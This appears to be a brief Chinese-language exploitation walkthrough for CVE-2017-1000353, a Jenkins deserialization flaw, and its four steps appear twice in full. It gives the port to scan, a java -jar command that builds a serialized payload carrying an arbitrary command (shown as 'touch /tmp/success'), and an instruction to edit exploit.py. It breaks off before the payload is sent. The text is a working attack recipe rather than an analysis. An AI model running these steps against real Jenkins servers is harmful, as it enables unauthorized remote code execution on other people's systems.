CVE-2017-1000353
1.扫描开放了8080端口,访问8080端口:
2、执行下面命令,生成字节码文件:
java -jar CVE-2017-1000353-1.1-SNAPSHOT-all.jar jenkins_poc.ser "touch /tmp/success"
3、执行上述代码后,生成jenkins_poc.ser文件,这就是序列化字符串,#"touch..."是待执行的任意命令
4、修改exploit.py,把proxies里面的内容注释掉
CVE-2017-1000353
1.扫描开放了8080端口,访问8080端口:
2、执行下面命令,生成字节码文件:
java -jar CVE-2017-1000353-1.1-SNAPSHOT-all.jar jenkins_poc.ser "touch /tmp/success"
3、执行上述代码后,生成jenkins_poc.ser文件,这就是序列化字符串,#"touch..."是待执行的任意命令
4、修改exploit.py,把proxies里面的内容注释掉